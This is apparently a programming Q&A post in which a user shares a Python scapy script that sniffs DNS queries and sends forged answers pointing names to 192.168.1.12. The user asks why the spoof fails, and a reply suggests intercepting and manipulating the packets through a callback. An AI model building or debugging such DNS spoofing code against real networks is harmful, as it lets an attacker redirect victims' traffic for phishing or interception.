Liron
Reputation: 49
Fake DNS response
I wanted to create a fake dns response with scapy and it's just doesn't work... When i sniff the packets in Wireshark it shows me that the packets are correct but Windows just takes the genuine response packet althought... Can someone tell me how to fix it please? Thanks
import sys
i, o, e = sys.stdin, sys.stdout, sys.stderr
from scapy.all import *
sys.stdin, sys.stdout, sys.stderr = i, o, e
def f(packet):
if DNS in packet and DNSQR in packet :
return True
return False
while True:
a=sniff(lfilter=f,count=1)
ip = a[0].getlayer(IP)
dns = a[0].getlayer(DNS)
pkt = Ether(dst = a[0][Ether].src, src = a[0][Ether].dst)/IP(dst=ip.src, src=ip.dst)/UDP(chksum=None, dport=ip.sport,sport=ip.dport)/DNS(qd=a[0][DNS].qd, qdcount=1, ancount=0, nscount=0, arcount=1, ra = 1, qr = 1, id=dns.id, an = (DNSRR(rrname=dns.qd.qname, type= "A" , ttl=3600, rdata="192.168.1.12")))
pkt.show()
for i in range(10):
sendp(pkt)
Upvotes: 0
Views: 1060
Answers (1)
Ali Kargar
Reputation: 189
You're just sniffing packets, if you want to manipulate packets you should send them to a function then forward them to the destination. use prn attribute in Sniff :
packets = sniff(filter="port 53" , prn=func , count=1)
def func(packet):
if packet.haslayer(UDP) and packet.haslayer(DNS):
manipulate your DNS packet here then forward it
Upvotes: 1
Related Questions
- DNS request with scapy (Python)
- How to spoof the IP address in a UDP packet with scapy
- Sending "ANY" response using Scapy/Python
- Scapy DNS Request
- DNS request using TCP using scapy
- DNS Cache poisoning in python
- Python UDP DNS to TCP DNS converter
- sniff with scapy DNS packet from specific IP
- Malformed DNS response packet (python + scapy)
- Scapy DNS request malformed only with TCP